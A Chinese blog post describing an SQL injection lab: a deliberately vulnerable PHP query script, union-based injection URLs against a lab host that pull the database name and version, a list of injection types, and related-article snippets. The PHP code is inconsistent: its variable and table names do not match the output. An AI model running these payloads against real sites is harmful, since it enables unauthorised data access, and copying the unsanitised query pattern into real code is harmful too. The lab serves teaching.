类型SQL注入实验 Part1

准备为PHPstudy环境

<?php

$id = $_GET[‘t‘];
$conn = mysql_connect("127.0.0.1","root","root");
mysql_select_db("kimmy",$conn);
$sql="select * from admin where use=$title";

$result = mysql_query($sql);
while($row = mysql_fetch_array($result)){
echo "UserId".$row[‘id‘]."<br >";
echo "Title".$row[‘title‘]."<br >";
echo "TextContent".$row[‘text‘]."<br >";
}

mysql_close($conn);

echo "The SQL Sentence:".$sql;

?>

数字型

字符型:
PHP脚本

URL:
http://192.168.221.188/sqltest/index.php?t=admin‘ union select 1,2,3 and ‘1‘=‘1

输出:
UserId:1
Username:admin
Password:password
UserId:1
Username:2
Password:1
The SQL Sentence:select * from info where username=‘admin‘ union select 1,2,3 and ‘1‘=‘1‘

URL:
http://192.168.221.188/sqltest/index.php?t=admin‘ union select database(),version(),3 and ‘1‘=‘1

输出:
UserId:1
Username:admin
Password:password
UserId:kimmy
Username:5.5.53
Password:1
The SQL Sentence:select * from info where username=‘admin‘ union select database(),version(),3 and ‘1‘=‘1‘

搜索型:
%通配符

提交注入

GET注入

Post注入

Cookie注入

http头注入

基础;http数据包

PHP:

$_GET 接受get传递

$_POST接受post传递

$_COOKIE接受cookie传递

$_REQUEST 全部接受

Asp:

Request.querystring  接受get

Request.form接受post

Request.cookie 接受cookie

Request 全部接受

原文地址:https://www.cnblogs.com/SonnyYeung/p/12528401.html

时间: 2024-08-11 22:33:29

类型SQL注入实验 Part1的相关文章

SEED实验系列:Collabtive系统SQL注入实验

本课程原文链接为:https://www.shiyanlou.com/courses/291.实验楼已经为此课程的实践提供了在线实验环境,想要尝试体验的,可以直接前往实验楼进行实践操作. 你能够喜欢我们的课程,让我们感到异常高兴,我们也非常欢迎你将本课程分享给更多的人,我们唯一的要求就是请保留我们的课程原文链接. 一.实验描述 SQL注入漏洞的代码注入技术,利用web应用程序和数据库服务器之间的接口.通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意

简单的sql注入——实验吧

刚刚做了实验吧的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! 永远爱你们的————新宝宝 简单的sql注入分值:10 来源: 实验吧 难度:中 参与人数:18007人 Get Flag:5644人 答题人数:6513人 解题通过率:87% 通过注入获得flag值(提交格式:flag{}). 解题链接: http://ctf5.shiyanbar.com/423/web

SQL注入学习总结(七):其他类型SQL注入之SQL约束攻击

其他类型注入的详解(4) 4.sql约束攻击 知识点 数据库字符串比较:在数据库对字符串进行比较时,如果两个字符的长度不一样,则会将较短的字符串末尾填充空格,使两个字符串的长度一致. 比如这两条语句 select * from admin where username='vampire' select *from admin where username='vampire ' 他们的查询结果是一致的. INSERT截断: 这是数据库的另一个特性,当设计一字段时,我们都必须对其设定一个最大长度,比

【合天网安实验室】SQL注入入门一

作者:[email protected] 时间:2015年1月17日 实验平台:合天网安实验室.Web应用安全.SQL注入实验一 实验环境:Apache+PHP+Mysql 实验原理: SQL注入是一种将SQL代码插入或添加到应用的输入参数中的攻击,之后再将这些参数传递给后台的SQL服务器加以解析并执行. 传统的手工 (1)     判断是否有注入点 方法一: 在url后面加’ 从而让SQL语句出错,那么页面就会提示出错信息.这时候就可以判断从这里存在注入.当然还有可能加了’,和没加是一样的,这

sql注入解析

sql注入解析 sql注入解析(一)基本语法 sql注入解析(二)执行注入 sql注入解析(三)数据库类型 sql注入解析(四)避开过滤

SQL注入是什么?如何防止?

SQL注入是一种注入攻击,可以执行恶意SQL语句.下面本篇文章就来带大家了解一下SQL注入,简单介绍一下防止SQL注入攻击的方法,希望对大家有所帮助. 什么是SQL注入? SQL注入(SQLi)是一种注入攻击,,可以执行恶意SQL语句.它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器.攻击者可以使用SQL注入漏洞绕过应用程序安全措施:可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容:还可以使用SQL注入来添加,修改和删除数据库中

实验二、XSS和SQL注入

一.  实验目的 了解什么是XSS:了解XSS攻击实施,理解防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计中避免出现SQL注入漏洞的基本方法:掌握网站配置.   二.  系统环境:Kali Linux2.Windows 三.  网络环境:交换网络结构 四.  实验工具:AWVS(Acunetix Web Vulnarability Scanner);SqlMAP:Dvwa:PHPStudy 五.  实验步骤: 1.XSS部分:利用Bee

WAF——针对Web应用发起的攻击,包括但不限于以下攻击类型:SQL注入、XSS跨站、Webshell上传、命令注入、非法HTTP协议请求、非授权文件访问等

核心概念 WAF Web应用防火墙(Web Application Firewall),简称WAF. Web攻击 针对Web应用发起的攻击,包括但不限于以下攻击类型:SQL注入.XSS跨站.Webshell上传.命令注入.非法HTTP协议请求.非授权文件访问等.

PHPCMS9.6.0最新版SQL注入和前台GETSHELL漏洞分析 (实验新课)

PHPCMS9.6.0最新版中,由于/modules/attachment/attachments.php的过滤函数的缺陷导致了可以绕过它的过滤机制形成SQL注入漏洞,可导致数据库中数据泄漏. 而且在前台上传文件处,没有对文件后缀进行严格的审查,导致可以前台GETSHELL,直接获取到了网站的权限.点击马上实验,i春秋安全专家带你体验漏洞成因及危害. https://www.ichunqiu.com/course/58003  课程详解 DEF CON 24·400米之外破解你的智能蓝牙锁(公开